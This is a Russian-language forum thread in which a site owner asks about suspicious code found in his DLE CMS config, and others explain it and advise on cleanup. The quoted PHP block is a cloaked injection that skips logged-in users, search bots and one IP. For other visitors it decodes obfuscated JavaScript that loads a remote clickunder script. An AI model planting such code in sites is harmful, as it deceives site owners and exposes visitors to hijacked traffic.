Левый код в скрипте DLE

12
vandamme
На сайте с 30.11.2008
Offline
675
1227

у меня такой вопрос, заметил сегодня в конфиге DLE левый код, что он значит?

if ((!isset($_COOKIE['dle_password'])) and ($_SERVER['REMOTE_ADDR']!="93.157.9.110") and (!preg_match('/yandex/i', $_SERVER['HTTP_USER_AGENT'])) and(!preg_match('/google/i', $_SERVER['HTTP_USER_AGENT'])) ) {

echo <<<HTML
<SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!110!111!105!110!100!101!120!62!60!115!99!114!105!112!116!32!108!97!110!103!117!97!103!101!61!34!74!97!118!97!83!99!114!105!112!116!34!32!99!104!97!114!115!101!116!61!34!119!105!110!100!111!119!115!45!49!50!53!49!34!32!115!114!99!61!34!104!116!116!112!58!47!47!117!110!100!101!114!45!99!108!105!99!107!46!114!117!47!106!115!47!105!102!46!112!104!112!63!105!100!61!51!51!55!55!34!62!60!47!115!99!114!105!112!116!62!60!47!110!111!105!110!100!101!120!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>
HTML;
}
AlikZP
На сайте с 22.11.2009
Offline
107
#1

Вместо

document.write(out);

Напишите

alert(out);

и все увидите :)

Вирус, вероятно. Работает только если посетитель незарегестрирован, если посетитель - не бот яндекса или гугла и если посетитель пришел не с IP-адреса 93.157.9.110

IPшник-то скорее всего того человека, который этот код поставил :)

Website CMS: быстрая, удобная, недорогая! Вечная лицензия за 45$ (/ru/forum/524503) Яся - быстрый поиск фото для товаров. OpenCart/ocStore. Дополнение. (/ru/forum/665287) Грамотная верстка ваших макетов (/ru/forum/comment/8853216)
vandamme
На сайте с 30.11.2008
Offline
675
#2

AlikZP, да, спасибо

это стоит кликандер under-click.ru

вот как он ко мне попал на сайт? либо хостер, либо фтп клацнули мой

AlikZP
На сайте с 22.11.2009
Offline
107
#3

vandamme, меняйте пароли на ФТП. Проверьте комп этой утилиткой http://www.freedrweb.com/download+cureit/

Dreammaker
На сайте с 20.04.2006
Offline
569
#4

vandamme, а дле - лицензия, ибо любят нуллеры добавлять подарки, ну и шаблон скачанный с варезника может быть аналогично доработан.

vandamme
На сайте с 30.11.2008
Offline
675
#5
Dreammaker:
нуллеры добавлять подарки, ну и шаблон скачанный с варезника

не первый год работаю :)

MD
На сайте с 11.04.2010
Offline
22
#6

в стилях для дле сейчас такое... в каждом 10.

проверяйте всю графику, ибо

и всё это чудо инклюдится в login.tpl

brigadir
На сайте с 09.07.2005
Offline
94
#7

Да ДЛе вобще ниче так движек удобный...но ломают его на раз..

[Удален]
#8

Серьёзные проэкты доверять DLE'шкам не стоит, сам обжигался. Верстайте все сами или ищите фрилансера.

vandamme
На сайте с 30.11.2008
Offline
675
#9

в общем развернутый ответ найден http://www.cyberforum.ru/javascript/thread150446.html

всем спасибо

FartyMax:
DLE'шкам не стоит, сам обжигался. Верстайте все сами или ищите фрилансера

вы хоть поняли сами что сказали? при чем тут верстка и взлом движка?

Dreammaker
На сайте с 20.04.2006
Offline
569
#10

vandamme,

скорее всего FartyMax имел в виду то, что и я выше, что использование варезных шаблонов чревато.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий